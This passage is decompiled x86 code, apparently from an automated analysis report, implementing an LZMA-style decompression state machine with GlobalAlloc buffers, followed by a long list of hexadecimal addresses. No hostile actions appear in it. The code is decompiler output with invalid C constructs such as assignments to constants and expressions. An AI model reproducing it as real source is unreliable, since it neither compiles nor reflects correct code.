								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
